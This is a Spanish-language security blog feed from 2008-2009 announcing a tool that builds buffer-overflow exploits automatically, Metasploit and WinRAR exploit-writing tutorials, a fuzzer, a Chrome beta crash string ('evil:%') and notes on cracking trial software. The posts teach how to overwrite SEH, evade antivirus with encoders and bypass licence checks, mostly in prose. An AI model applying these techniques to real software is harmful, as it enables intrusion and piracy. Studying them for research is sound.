/>Saludos.Bokenhttp://www.blogger.com/profile/13008727550075774684noreply@blogger.com2tag:blogger.com,1999:blog-647648746783162534.post-7856613491956659192009-08-10T14:31:00.000-07:002009-08-10T14:36:51.317-07:00Del crash al Exploit a golpe de click (III)Mi socio <span style="font-weight: bold;">Yibam</span> esta lanzado y os ha preparado otro vídeo explicativo del uso de la herramienta EEW (Expert Exploit Writer). Podéis verlo <a href="http://explotandotodo.blogspot.com/2009/08/del-crash-al-exploit-golpe-de-click-iii.html">aquí</a>.<br /><br />Como podéis ver, en este vídeo se han modificado algunos puntos para que los resultados sean mas visuales. Además se pueden empezar a ver algunos detalles como la detección de si se pisa o no SE Handler, si esta o no activado la opción de AntiDEP, si se ha producido una excepción del tipo ACCESS VIOLATION on write, on read o on execute.<br /><br />Según el tipo de excepción monta el evilbuffer de una manera u otra, buscando y recopilando las dirección o información necesaria para ello.<br /><br />Espero que os guste el vídeo. Cualquier duda, critica, opinión, proposición, ya sabéis como contactar con nosotros.<br /><br />Saludos.Bokenhttp://www.blogger.com/profile/13008727550075774684noreply@blogger.com0tag:blogger.com,1999:blog-647648746783162534.post-51718906741988836952009-08-09T12:33:00.000-07:002009-08-09T12:39:24.153-07:00Del crash al Exploit a golpe de click (II)Para que podáis haceros una mejor idea de la herramienta que venimos desarrollando, podéis ver un vídeo realizado por <span style="font-weight: bold;">Yibam</span>, en el que muestra una sesión de uso.<br /><br />En primer lugar selecciona el software vulnerable, especifica el template que debe cumpliar el evilbuffer (cadena larga especialmente manipulada para explotar el buffer overflow). En este caso, no debe de cumplir ningún formato especial, simplemente se indica que muestre [evilbuffer].<br /><br />Luego especifica la longitud de la cadena para producir el crash, y finalmente especifica la vía por la cual se envía la PoC (prueba de concepto) creado automaticamente.<br /><br /><a href="http://explotandotodo.blogspot.com/2009/08/explotando-golpe-de-click.html">Aquí</a> tenéis el post con el vídeo, espero que os guste ;DBokenhttp://www.blogger.com/profile/13008727550075774684noreply@blogger.com0tag:blogger.com,1999:blog-647648746783162534.post-40504366640966263992009-08-07T15:23:00.000-07:002009-08-07T15:35:07.709-07:00Automatización para la busqueda de trampolines.Al hilo del anterior <a href="http://boken00.blogspot.com/2009/08/del-crash-al-exploit-golpe-de-click.html">post</a>, os muestro uno de los resultados obtenidos con la herramienta que <span style="font-weight: bold;">Yibam</span> y yo estamos desarrollando.<br /><br />La siguiente imagen es un sesion con Immunity Debugger (Ollydbg) justo en el momento en que se desborda la seccion de la pila y al pisar el puntero SEH, se intenta manejar la excepcion redirigiendo el programa a este puntero manipulado por el exploit en python creado automaticamente por la herramienta ;D<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivt3dXRn2ZAOotvJVS_ls32-T6uqDs9bZgEANzx8eEWnNYqDzcmKcaBgun7yriLuVrwjjyIplYi167-1Tn4LZi2TccK2T2ppu97gy-X86L-ZPzKWdRR6tG_kTUM4t-Sq0kqA_Nm-cb7r8/s1600-h/Snapshot2.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 235px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivt3dXRn2ZAOotvJVS_ls32-T6uqDs9bZgEANzx8eEWnNYqDzcmKcaBgun7yriLuVrwjjyIplYi167-1Tn4LZi2TccK2T2ppu97gy-X86L-ZPzKWdRR6tG_kTUM4t-Sq0kqA_Nm-cb7r8/s400/Snapshot2.JPG" alt="" id="BLOGGER_PHOTO_ID_5367352813986508194" border="0" /></a>Como se puede observar abajo a la derecha, se sobrepasa la seccion, pero sobreescribiendo el puntero SE Handler con la direccion de un CALL [EBP+10] que es donde esta nuestra Shellcode de prueba, como se puede ver arriba de la pila. Esta Shellcode de prueba es CCCCCCCC que en ASM seria:<br />INT3<br />INT3<br />INT3<br />INT3<br /><br />Que de ejecutarse, provocaria una excepcion de tipo BREAKPOINT.<br /><br />Bueno esto es solo una de las caracteristicas de nuestra herramienta que estamos desarrollando ;D<br /><br />Seguiremos contando....Bokenhttp://www.blogger.com/profile/13008727550075774684noreply@blogger.com0tag:blogger.com,1999:blog-647648746783162534.post-29621541444156611542009-08-05T01:21:00.000-07:002009-08-05T02:03:43.541-07:00Del crash al Exploit a golpe de clickHola a todos!!<br /><br />Hace ya mucho tiempo que no escribía nada y no era ni por falta de ganas ni de cosas que contar ;D<br /><br />Así que voy a comenzar esta nueva etapa a lo grande!!! Hace unos cuatro meses, que <span style="font-weight: bold;">Yibam</span> y yo venimos desarrollando al hilo del concurso 15 de CrackSLatinoS, una herramienta capaz de generar exploits funcionales en forma de ficheros script en Python, a partir de un PoC (Prueba de concepto) proporcionada por el usuario.<br /><br />El usuario indicaría la longitud de la cadena que provoca el Buffer Overflow, la via por la cual el software vulnerable es capaz de recibir dicha cadena. Por linea de comandos, en forma de fichero interpretables por el software vulnerable, por conexión de red (socket), como argumento de una función de una libreria .dll, etc... Y la herramienta comienza todo el proceso de análisis.<br /><br />El análisis automático que realiza la herramienta, consiste en montar la PoC y lanzarlo contra el software vulnerable para provocar el crash de Access Violation. Debido a la infinidad de casos, la herramienta va salvando los diferentes obstáculos (AntiDEP, SafeSEH, excepciones de escritura o lectura de ciertas direcciones, localización de direcciones validas para hacer un trampolin valido, etc...) hasta llegar a sobreescribir EIP y con toda esa información, crear un script .py que al lanzarlo de manera independiente, sea capaz de ejecutar una shellcode explotando el fallo indicado por la PoC en el software vulnerable.<br /><br />Para que podáis haceros una pequeña idea, os adjunto una imagen, de la herramienta en plena faena, mientras esta analizando un crash producido en busca de posibles trampolines con los que saltar a la Shellcode.<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0irjr5DH2KXZhi8-fOYrkKWPQFgnVNgQSqfpRnVGTuw_AnXI_REpGruKbuQhFYp0MKp5_vlbAxoAPDyw2rri517bfpZqfsMIyL-Etgkm3CgPTxomp3hFZT6r5prutEzvjDBcrUebXs_s/s1600-h/Snapshot1.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 187px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0irjr5DH2KXZhi8-fOYrkKWPQFgnVNgQSqfpRnVGTuw_AnXI_REpGruKbuQhFYp0MKp5_vlbAxoAPDyw2rri517bfpZqfsMIyL-Etgkm3CgPTxomp3hFZT6r5prutEzvjDBcrUebXs_s/s320/Snapshot1.JPG" alt="" id="BLOGGER_PHOTO_ID_5366399458390228194" border="0" /></a>Como podéis ver en la ventana de la derecha, ha encontrado un trampolin respecto al registro ECX.<br /><br />El desarrollo esta aun en fases preliminares, en breve liberaremos un pre-release para que podáis verla y testearla a vuestro gusto ;D<br /><br />Pero aun hay mas.... La herramienta esta pensada como API en Python para que cada uno pueda utilizarla y hacer sus propios exploits. La imagen anterior es un entorno de ventanas con wxPython hecho posteriormente al desarrollo de todas sus funcionalidades, es decir solo como frontend. La herramienta puede ser utilizada como módulos Python para que cada uno la adapte a sus necesidades y pueda crear sus propias aplicaciones con los beneficios que esta aporta.<br /><br />Espero que este nuevo proyecto que estamos afrontando, os resulte tan interesante como a nosotros. Nos vemos en la inminente pre-release!!!<br /><br />Saludos!!Bokenhttp://www.blogger.com/profile/13008727550075774684noreply@blogger.com4tag:blogger.com,1999:blog-647648746783162534.post-21334815506543983082009-01-15T01:36:00.000-08:002009-01-15T07:54:07.302-08:00Del parche al exploit con BinDiff e ImmunityDebuggerCon motivo del apartado 4 del concurso 11 de 2008 de CrackSLatinoS, Ricardo propuso analizar 2 versiones consecutivas de WinRAR, para detectar que vulnerabilidad corregía la versión mas nueva.<br /><br />En este caso de trata de las versiones WinRAR 3.10 y 3.11. La versión 3.10 de WinRAR no comprueba la longitud de las extensiones de los ficheros contenidos un fichero comprimido y procede a copiar su totalidad en una variable local alojada en la pila. Al desbordar esta variable sobreescribe la dirección de retorno guardada en la pila, pudiendo manipular esta dirección, es posible ejecutar código arbitrario.<br /><br />En el tutorial se explica en detalle como utilizar BinDiff 2 y como analizar los datos que ofrece, para detectar el bloque vulnerable lo mas rápido y eficazmente posible.<br /><br />Además se procede a elaborar un script que genera un fichero comprimido que provoca el Buffer Overflow y sirve de PoC (Prueba de concepto)<br /><br />El tutorial finaliza mostrando los detalles necesarios para convertir la PoC en un exploit totalmente funcional, con el que se puede ejecutar código arbitrario en cualquier víctima que abra el fichero comprimido con la versión de WinRAR 3.10 y anteriores.<br /><br />Espero que os guste y disfrutéis leyéndolo.<br />Podéis descargar el tutorial pinchando<a href="http://www.mediafire.com/?nwm2nwzdzmg"> aquí</a>.Bokenhttp://www.blogger.com/profile/13008727550075774684noreply@blogger.com9tag:blogger.com,1999:blog-647648746783162534.post-37675097947375711212008-12-23T07:09:00.000-08:002008-12-23T07:24:59.291-08:00Desarrollo de exploits con Metasploit 3 desde cero - Parte 3Lo prometido es deuda y +NCR/CRC! ha cumplido su parte ;D La tercera parte de esta serie de tutoriales, ha salido a la luz y la podeis descargar de <a href="http://www.mediafire.com/?mindyynizyj">aquí</a>.<br /><br />Esta parte, explica como realizar el famoso ataque "SMB Relay Attack" utilizando Metasploit. También denominado "SMB Credential Reflection" por Microsoft.<br /><br />Analiza detalladamente los paquetes que intervienen en el ataque, y explica el código fuente el exploit proporcionado por Metasploit.<br /><br />Este tutorial, no solo habla de como desarrollar el exploit para esta vulnerabilidad, sino que explica el funcionamiento de los protocolos de red que intervienen en el mismo. Además muestra de que manera podemos utilizar Metasploit para levantar servicios RPC e interactuar mediante SMB.<br /><br />Destacar también, que en el anexo se explica el ataque pero realizado contra la autenticación en HTTP, que puede resultar mas familiar y donde es mas fácil de comprender el funcionamiento de la autenticación.<br /><br />Espero que aprendan mucho y que les guste, porque se de primera mano que +NCR/CRC! se ha esforzado mucho para que podamos disfrutarlo.<br /><br />Gracias +NCR/CRC!Bokenhttp://www.blogger.com/profile/13008727550075774684noreply@blogger.com2tag:blogger.com,1999:blog-647648746783162534.post-1238025638001989402008-12-17T08:11:00.000-08:002008-12-20T11:13:55.338-08:00Desarrollo de un Fuzzer genérico para binarios PE con PyDbgHace ya algún tiempo que conozco PAIMEI, que es un framework para ingeniería inversa. Este trae consigo un debugger programable, hecho en Python (PyDbg). Lo que permite poder utilizarlo para lo que nosotros queramos, en nuestros propios scripts. No hay mucha información de uso al respecto y menos en castellano, así que la mejor manera de aprender a utilizarlo, es manchandose las manos uno mismo ;D<br /><br />Con esta idea y otras que me rondaban ya hace tiempo en la cabeza, he desarrollado a modo de prueba un Fuzzer genérico para binarios PE con PyDbg. Es decir para ejecutables .exe<br /><p>Este fuzzer, es capaz de invocar todas y cada una de las funciones de un binario ejecutable, con valores críticos para cada uno de los argumentos y registrar todas las combinaciones de argumentos que provocan un ACCESS VIOLATION al ser invocadas.<br /></p>Este seria el punto de partida para la búsqueda de algún Buffer Overflow, en un cualquier software.<br /><br />El proyecto y su respectivo tutorial, donde se explica todo el proceso de elaboración, lo podéis descargar de <a href="http://www.mediafire.com/?d2ttmjmftzy">aquí</a>.<br /><br />Espero que os sea útil.Bokenhttp://www.blogger.com/profile/13008727550075774684noreply@blogger.com1tag:blogger.com,1999:blog-647648746783162534.post-37895334225933193712008-11-23T09:04:00.000-08:002008-12-08T09:06:09.046-08:00Desarrollo de exploits con Metasploit 3 desde cero - Parte 2Hace un par de días que termine la segunda parte de la serie de tutoriales que explica como utilizar el framework Metasploit 3, para desarrollar nuestros propios exploit.<br /><br />Podéis descargarlo <a href="http://www.mediafire.com/download.php?m5mqgzzjtmd">aquí</a>.<br /><br />En esta parte se explica como terminar los exploits propuestos en la parte 1, utilizando las diferentes utilidades que nos proporciona Metasploit, haciéndolo todo lo flexible y potente que nos permite hacer este maravilloso framework. Además se hace una breve introducción sobre ellos:<br /><br />- <span style="font-style: italic;">Msfpayload</span>: Para introducir en nuestro exploit las diferentes shellcodes para ejecutar código, abrir puertos, descargar fichero remotos, ejecutar un potente shell (Meterpreter)<br />- <span style="font-style: italic;">Msfencode</span>: Para codificar nuestras shellcodes y hacer nuestros exploit polimórficos y evitar firmas de antivirus e IDS, muy util ;D<br />- <span style="font-style: italic;">Msfopcode</span>: Una base de datos donde encontrar los necesarios RET, POP/POP/RET, JMP ESP, etc...<br /><br />En las próximas entregas, se explicaran algunas utilidades mas. Aprovecho para comunicar que en las siguientes entregas, participaran 2 miembros de CrackSLatinoS, <a href="http://nahuelriva.googlepages.com/index">+NCR/CRC!</a> y <a href="http://www.ulises2k.com.ar/">Ulises2k</a>, ellos escribirán sobre como hacer unos exploit MUY INTERESANTES para Metasploit!! Espero que os guste!.<br /><br />Hasta la próxima entrega!Bokenhttp://www.blogger.com/profile/13008727550075774684noreply@blogger.com1tag:blogger.com,1999:blog-647648746783162534.post-86458385039068815912008-10-10T00:24:00.000-07:002008-10-10T02:28:30.058-07:00¿Quien dijo que programar en Assembler no es coser y cantar?Hace ya algo de tiempo que no escribía nada, pero cuando hice el blog, pensé en poner cosas interesantes y que resulten útiles para la gente con intereses afines a los mios, así que prefiero no escribir que escribir por escribir.<br /><br />Ahora al tema que nos ocupa. ¿Quien dijo que programar en ASM (Assembler) es engorroso y muy difícil? Eso sera porque no conoce el IDE RadASM ;D<br /><br />Para todo el que tenga ganas de programar en ASM como el que programa en Borland C++, Delphi, o incluso diría que en Visual Basic, solo tiene que visitar estos 2 enlaces y en menos de lo que piensa podrá ponerse a ello ;D<br /><br /><span style="font-weight: bold;">Tutorial de Iczelion: </span><a href="http://win32assembly.online.fr/tutorials.html">http://win32assembly.online.fr/tutorials.html</a><br />Los tutoriales del 1 al 35 estan traducidos al castellano. Con esto sabréis toda la teoría y practica sobre como programar para Win32: Ventanas, controles, procesos, multithread, systray, MDI ....<br /><br />Luego hay otra parte en ingles, sobre VxD, ODBC, PE File Format. Interesantisimos!!<br /><br /><span style="font-weight: bold;">Turotial de ASM-RadASM:</span> <a href="http://ricardonarvaja.info/WEB/OTROS/DE%20LA%20LISTA%20MASM32-RADSM/CURSO%20DE%20ASM%20DESDE%20CERO/">http://ricardonarvaja.info/WEB/OTROS/DE%20LA%20LISTA%20MASM32-RADSM/CURSO%20DE%20ASM%20DESDE%20CERO/</a><br />Este tutorial de 6 partes, eminentemente practico, muestra la sencillez con la que se puede programar en Assembler gracias al IDE RadASM. Además lo hace con varios vídeos cortos donde explica cada concepto.<br />Un tutorial muy rápido de leer y que va al grano.<br /><br />Ahora si que no tenéis excusas para no programar en Assembler porque es engorroso hacer ventanitas, ni hacer condicionales, ni bucles, ni nada de eso ;D<br /><br />Espero que lo disfruteis!Bokenhttp://www.blogger.com/profile/13008727550075774684noreply@blogger.com0tag:blogger.com,1999:blog-647648746783162534.post-225803154937704592008-09-03T08:47:00.000-07:002008-09-03T09:21:34.052-07:00Si es version beta, por algo será...Como todo el que haya navegado hoy con Google, habrá visto el enlace a su nuevo navegador, Google Chrome. Eso no es novedad.<br /><br />Tampoco lo es, ya que hace varias semana que es publico, un bug para Google Chrome Browser 0.2.149.27, que provoca un <a href="http://es.wikipedia.org/wiki/Ataque_de_denegaci%C3%B3n_de_servicio">DoS</a>.<br /><br />Esto es provocado al ir al siguiente enlace:<br />evil:%<br /><br />Al poner esto en la barra de direcciones o al intentar dirigirse a esta dirección (<a href="evil:%">Pincha aquí</a>) la librería chrome.dll provoca una excepción no controlada por el manejador de excepciones. Por eso sale la ventana típica de: Debug | Send Report | Don't Send.<br /><br />Si le damos a Debug, vemos como salta a una dirección cuyo contenido es INT3. Con razón que cause una excepción. Esto provoca que se lance el debuguer asignado como JIT.<br /><br />Cuando salta el debuger, vemos esto:<br />01002FF0 /. PUSH EBP<br />01002FF1 |. MOV EBP,ESP<br />01002FF3 |. INT3<br />01002FF4 |. POP EBP<br />01002FF5 \. RETN<br /><br />Esta parado en 01002FF3, como podemos ver luego restaura EBP y sale del CALL de manera correcta, el ret de la pila no es manipulable. Si seguimos vemos que se reinicia de nuevo el Chrome.<br /><br />Con este pequeño análisis podíamos descartar la posibilidad de ejecutar código, ya que no se aprecia ningún Buffer Overflow, solo que al ser una versión beta, aun les queda por programar el manejador de excepciones para este trozo de código ;D Hale señores de Google, a currar que seguro que la versión estable es bastante buena.Bokenhttp://www.blogger.com/profile/13008727550075774684noreply@blogger.com3tag:blogger.com,1999:blog-647648746783162534.post-76501451442152168132008-08-18T07:01:00.000-07:002008-08-18T07:20:25.401-07:00And the winner is ...Hace unos meses que <span class="blsp-spelling-corrected" id="SPELLING_ERROR_0">empecé</span> con el tema de los concursos en <span class="blsp-spelling-error" id="SPELLING_ERROR_1"><span class="blsp-spelling-error" id="SPELLING_ERROR_0">CrackSLatinoS</span></span> y cerrado el Concurso 6 y sumados los puntos totales, el ganador del regalo que se <span class="blsp-spelling-error" id="SPELLING_ERROR_2"><span class="blsp-spelling-corrected" id="SPELLING_ERROR_1">ofrecía</span></span> para el que mas puntuara hasta el concurso de Julio, ha sido....<span style="font-style: italic;">redoble tambores</span>.....: <span style="font-weight: bold; font-style: italic;"><span class="blsp-spelling-error" id="SPELLING_ERROR_3"><span class="blsp-spelling-error" id="SPELLING_ERROR_2">Boken</span></span></span><br /><br />Los concursos constan de 5 o 6 apartados. 1 de <span class="blsp-spelling-error" id="SPELLING_ERROR_4"><span class="blsp-spelling-error" id="SPELLING_ERROR_3">exploits</span></span> y el resto de <span class="blsp-spelling-corrected" id="SPELLING_ERROR_5">desproteger</span> <span class="blsp-spelling-error" id="SPELLING_ERROR_6"><span class="blsp-spelling-error" id="SPELLING_ERROR_4">crackme</span></span>s con diferentes empaquetadores comerciales o de prueba, hacer <span class="blsp-spelling-error" id="SPELLING_ERROR_7"><span class="blsp-spelling-error" id="SPELLING_ERROR_5">keygens</span></span>, etc...<br /><br />Los <span class="blsp-spelling-error" id="SPELLING_ERROR_8"><span class="blsp-spelling-error" id="SPELLING_ERROR_6">exploits</span></span> puntuaban bastante, y me ha valido para puntuar lo suficiente como para resultar ganador ;D<br /><br />El premio, es el <span class="blsp-spelling-corrected" id="SPELLING_ERROR_9">increíble</span> libro:<br /><a href="http://www.amazon.com/Shellcoders-Handbook-Discovering-Exploiting-Security/dp/047008023X">http://www.amazon.com/Shellcoders-Handbook-Discovering-Exploiting-Security/dp/047008023X</a><br />en el que colabora <span class="blsp-spelling-error" id="SPELLING_ERROR_10"><span class="blsp-spelling-error" id="SPELLING_ERROR_7">Gerardo</span></span> <span class="blsp-spelling-error" id="SPELLING_ERROR_11"><span class="blsp-spelling-error" id="SPELLING_ERROR_8">Richarte</span></span>, miembro de <span class="blsp-spelling-error" id="SPELLING_ERROR_12"><span class="blsp-spelling-error" id="SPELLING_ERROR_9">CrackSLatinoS</span></span> y <span class="blsp-spelling-error" id="SPELLING_ERROR_13"><span class="blsp-spelling-error" id="SPELLING_ERROR_10">cofundador</span></span> de <span class="blsp-spelling-error" id="SPELLING_ERROR_14"><span class="blsp-spelling-error" id="SPELLING_ERROR_11">CORE</span></span> <span class="blsp-spelling-error" id="SPELLING_ERROR_15"><span class="blsp-spelling-error" id="SPELLING_ERROR_12">Security</span></span>, donde trabajan algunos miembros de la lista reconvertidos de "<span class="blsp-spelling-error" id="SPELLING_ERROR_16"><span class="blsp-spelling-error" id="SPELLING_ERROR_13">crackers</span></span>" a "<span class="blsp-spelling-error" id="SPELLING_ERROR_17"><span class="blsp-spelling-error" id="SPELLING_ERROR_14">exploit</span></span> <span class="blsp-spelling-error" id="SPELLING_ERROR_18"><span class="blsp-spelling-error" id="SPELLING_ERROR_15">writer</span></span>", <span class="blsp-spelling-corrected" id="SPELLING_ERROR_19">ingeniería</span> inversa al fin y al cabo ;D<br /><br />Mis soluciones a los apartados que hice, sobre los concursos, los <span class="blsp-spelling-corrected" id="SPELLING_ERROR_20">podéis</span> leer <span class="blsp-spelling-corrected" id="SPELLING_ERROR_21">aquí</span>:<br /><a href="http://boken00.blogspot.com/2008/07/ingenieria-inversa-y-crackslatinos.html">http://boken00.blogspot.com/2008/07/ingenieria-inversa-y-crackslatinos.html</a><br />al final del mensaje <span class="blsp-spelling-corrected" id="SPELLING_ERROR_22">están</span> los enlaces de mis soluciones.<br /><br />Espero haberos animado a concursar y formar parte de la lista, para que entre todos podamos aprender mucho mas!!<br /><br />Saludos.Bokenhttp://www.blogger.com/profile/13008727550075774684noreply@blogger.com0tag:blogger.com,1999:blog-647648746783162534.post-2509909619171986272008-08-14T03:16:00.000-07:002008-08-16T15:32:12.485-07:00Desarrollo de exploits con Metasploit 3 desde cero - Parte 1Acabo de terminar un <span class="blsp-spelling-error" id="SPELLING_ERROR_0"><span class="blsp-spelling-error" id="SPELLING_ERROR_0">tutorial</span></span> a modo de <span class="blsp-spelling-corrected" id="SPELLING_ERROR_1">introducción</span> sobre el desarrollo de <span class="blsp-spelling-error" id="SPELLING_ERROR_2"><span class="blsp-spelling-error" id="SPELLING_ERROR_1">exploits</span></span> en <span class="blsp-spelling-error" id="SPELLING_ERROR_3"><span class="blsp-spelling-error" id="SPELLING_ERROR_2">Metasploit</span></span> 3.<br /><br />Este se estructura <span class="blsp-spelling-corrected" id="SPELLING_ERROR_4">básicamente</span> en 2 puntos:<br />- <span style="font-weight: bold;">Desarrollo <span class="blsp-spelling-corrected" id="SPELLING_ERROR_5">básico</span> de <span class="blsp-spelling-error" id="SPELLING_ERROR_6"><span class="blsp-spelling-error" id="SPELLING_ERROR_3">exploit</span></span> <span class="blsp-spelling-error" id="SPELLING_ERROR_7"><span class="blsp-spelling-error" id="SPELLING_ERROR_4">Server</span></span>-<span class="blsp-spelling-error" id="SPELLING_ERROR_8"><span class="blsp-spelling-error" id="SPELLING_ERROR_5">side</span></span>: </span>Los que se explotan <span class="blsp-spelling-corrected" id="SPELLING_ERROR_9">enviándose</span> mediante una <span class="blsp-spelling-corrected" id="SPELLING_ERROR_10">conexión</span> de red. Tipo servidores <span class="blsp-spelling-error" id="SPELLING_ERROR_11"><span class="blsp-spelling-error" id="SPELLING_ERROR_6">Web</span></span>, ftp, etc...<br />- <span style="font-weight: bold;">Desarrollo <span class="blsp-spelling-corrected" id="SPELLING_ERROR_12">básico</span> de <span class="blsp-spelling-error" id="SPELLING_ERROR_13"><span class="blsp-spelling-error" id="SPELLING_ERROR_7">exploit</span></span> <span class="blsp-spelling-error" id="SPELLING_ERROR_14"><span class="blsp-spelling-error" id="SPELLING_ERROR_8">Client</span></span>-<span class="blsp-spelling-error" id="SPELLING_ERROR_15"><span class="blsp-spelling-error" id="SPELLING_ERROR_9">side</span></span>:</span> Los que se explotan creando un fichero que explota el fallo al ser abierto por un programa cliente. Tipo reproductores multimedia, visores de <span class="blsp-spelling-error" id="SPELLING_ERROR_16">imágenes</span>, etc...<br /><br />El <span class="blsp-spelling-error" id="SPELLING_ERROR_10">tutorial</span> lo <span class="blsp-spelling-corrected" id="SPELLING_ERROR_11">podéis</span> descargar <span class="blsp-spelling-error" id="SPELLING_ERROR_12">desde</span> el siguiente enlace, en la pagina <span class="blsp-spelling-error" id="SPELLING_ERROR_13">web</span> de Ricardo <span class="blsp-spelling-error" id="SPELLING_ERROR_14">Narvaja</span>:<a href="http://ricardonarvaja.info/WEB/CURSO%20NUEVO/TEORIAS%20NUMERADAS/1001-1100/1045-Desarrollo%20de%20exploits%20con%20Metasploit%203%20desde%20cero%20-%20Parte%201%20-%20Boken.rar"><br />http://ricardonarvaja.info/WEB/OTROS/EXPLOIT/Desarrollo%20de%20exploits%20con%20Metasploit%203%20desde%20cero%20-%20Parte%201%20-%20Boken.rar</a><br /><br />Espero que os guste.Bokenhttp://www.blogger.com/profile/13008727550075774684noreply@blogger.com2tag:blogger.com,1999:blog-647648746783162534.post-1334429797982017312008-08-09T14:56:00.000-07:002008-08-09T15:08:48.518-07:00Windows Vista ha muerto!!Como todos los años, se celebra en Las Vegas el <span class="blsp-spelling-error" id="SPELLING_ERROR_0">Black</span> <span class="blsp-spelling-error" id="SPELLING_ERROR_1">Hat</span>. El evento mas importante en cuanto a seguridad <span class="blsp-spelling-corrected" id="SPELLING_ERROR_2">informática</span> a nivel mundial.<br /><br />Para los investigadores es el momento de mostrar sus descubrimientos y de este modo poder darle la mayor <span class="blsp-spelling-corrected" id="SPELLING_ERROR_3">expansión</span> posible a sus trabajos.<br /><br />Parece ser que este año, para no decepcionar a nadie, han mostrado el descubrimiento de una vulnerabilidad, critica e irreparable con parches, en <span class="blsp-spelling-error" id="SPELLING_ERROR_4">Windows</span> Vista.<br /><br />Digo irreparable con parches, porque al parecer las <span class="blsp-spelling-corrected" id="SPELLING_ERROR_5">políticas</span> de seguridad de <span class="blsp-spelling-error" id="SPELLING_ERROR_6">Windwos</span> Vista se basan en las <span class="blsp-spelling-corrected" id="SPELLING_ERROR_7">políticas</span> de seguridad de .<span class="blsp-spelling-error" id="SPELLING_ERROR_8">NET</span> y como esto es <span class="blsp-spelling-corrected" id="SPELLING_ERROR_9">código</span> interpretado y ejecutado en el cliente, es posible su <span class="blsp-spelling-corrected" id="SPELLING_ERROR_10">manipulación</span>, por lo que deja fuera de juego a cualquier otra medida de seguridad tales como <span class="blsp-spelling-error" id="SPELLING_ERROR_11">Firewalls</span>, etc...<br /><br /><span class="blsp-spelling-corrected" id="SPELLING_ERROR_12">Podéis</span> leer mas detalles <span class="blsp-spelling-corrected" id="SPELLING_ERROR_13">aquí</span>:<br /><a href="http://www.taringa.net/posts/noticias/1444883/Alerta-m%E1xima-si-eres-usuarios-de-Windows-Vista.html">http://www.taringa.net/posts/noticias/1444883/Alerta-m%E1xima-si-eres-usuarios-de-Windows-Vista.html</a><br /><br />A ver por donde sale ahora Microsoft, porque si ya estaba pensando en otro Sistema Operativo para ordenadores personales, creo que va a ser el momento de acelerar su desarrollo.<br /><br />Desde <span class="blsp-spelling-error" id="SPELLING_ERROR_14">Boken</span>'s Blog, espero los primeros <span class="blsp-spelling-error" id="SPELLING_ERROR_15">exploits</span> o <span class="blsp-spelling-error" id="SPELLING_ERROR_16">PoC</span> sobre este suculento fallo, para poder hacer desde <span class="blsp-spelling-corrected" id="SPELLING_ERROR_17">aquí</span> mis primeras pruebas ;DBokenhttp://www.blogger.com/profile/13008727550075774684noreply@blogger.com4tag:blogger.com,1999:blog-647648746783162534.post-58515831251167891482008-08-01T04:17:00.000-07:002008-08-01T05:24:46.621-07:00Cracking y analizar virus<span class="blsp-spelling-corrected" id="SPELLING_ERROR_0">Después</span> de leer muchos <span class="blsp-spelling-error" id="SPELLING_ERROR_1">tutoriales</span> de los miembros de <span class="blsp-spelling-error" id="SPELLING_ERROR_2">CrackSLatinoS</span>, donde se explica como hacer que los programas se ejecuten en su <span class="blsp-spelling-corrected" id="SPELLING_ERROR_3">versión</span> completa en lugar de su <span class="blsp-spelling-corrected" id="SPELLING_ERROR_4">versión</span> de 30 <span class="blsp-spelling-corrected" id="SPELLING_ERROR_5">días</span>, me queda claro lo siguiente:<br /><br />Al intentar <span class="blsp-spelling-error" id="SPELLING_ERROR_6">crackear</span> un software te encuentras con 2 tipos:<br />1.- <span style="font-weight: bold;">Sin empaquetar</span>: el programador implementa sus propias <span class="blsp-spelling-corrected" id="SPELLING_ERROR_7">técnicas</span> para que se ejecute en <span class="blsp-spelling-corrected" id="SPELLING_ERROR_8">versión</span> <span class="blsp-spelling-error" id="SPELLING_ERROR_9">demo</span>. Hay que identificar el mensaje que nos dice que es una <span class="blsp-spelling-corrected" id="SPELLING_ERROR_10">versión</span> <span class="blsp-spelling-error" id="SPELLING_ERROR_11">demo</span>, e ir hacia <span class="blsp-spelling-corrected" id="SPELLING_ERROR_12">atrás</span> hasta identificar el salto condicional que nos identifica como usuarios <span class="blsp-spelling-corrected" id="SPELLING_ERROR_13">legítimos</span> o no.<br />Esto normalmente es relativamente sencillo, <span class="blsp-spelling-corrected" id="SPELLING_ERROR_14">según</span> la experiencia, pero <span class="blsp-spelling-corrected" id="SPELLING_ERROR_15">también</span> puede ser bastante complicado si el <span class="blsp-spelling-error" id="SPELLING_ERROR_16">programador</span> sabe lo que hace.<br /><br />2.- <span style="font-weight: bold;">Empaquetados:</span> El programador da por hecho que no sabe mas que los <span class="blsp-spelling-error" id="SPELLING_ERROR_17">crackers</span>, hace una simple <span class="blsp-spelling-corrected" id="SPELLING_ERROR_18">evaluación</span> de si es <span class="blsp-spelling-corrected" id="SPELLING_ERROR_19">versión</span> <span class="blsp-spelling-error" id="SPELLING_ERROR_20">demo</span> o completa, y deja en manos de los <span class="blsp-spelling-error" id="SPELLING_ERROR_21">crackers</span> convertidos en <span class="blsp-spelling-error" id="SPELLING_ERROR_22">anti</span>-<span class="blsp-spelling-error" id="SPELLING_ERROR_23">crackers</span>, para que protejan sus programas, previa compra de sus programas empaquetadores.<br />Estos empaquetadores, leen el .<span class="blsp-spelling-error" id="SPELLING_ERROR_24">exe</span> original, lo codifican/<span class="blsp-spelling-error" id="SPELLING_ERROR_25">encriptan</span>, modifican las <span class="blsp-spelling-error" id="SPELLING_ERROR_26">import</span> <span class="blsp-spelling-error" id="SPELLING_ERROR_27">tables</span>, secciones, y <span class="blsp-spelling-corrected" id="SPELLING_ERROR_28">demás</span> y crean un .<span class="blsp-spelling-error" id="SPELLING_ERROR_29">exe</span>, que es el que se distribuye. Este se encarga de recomponer descodificar/<span class="blsp-spelling-error" id="SPELLING_ERROR_30">desencriptar</span> el .<span class="blsp-spelling-error" id="SPELLING_ERROR_31">exe</span> original en tiempo de <span class="blsp-spelling-corrected" id="SPELLING_ERROR_32">ejecución</span>, para poder lanzarlo y que funcione. Esto "imposibilita" el proceso de <span class="blsp-spelling-corrected" 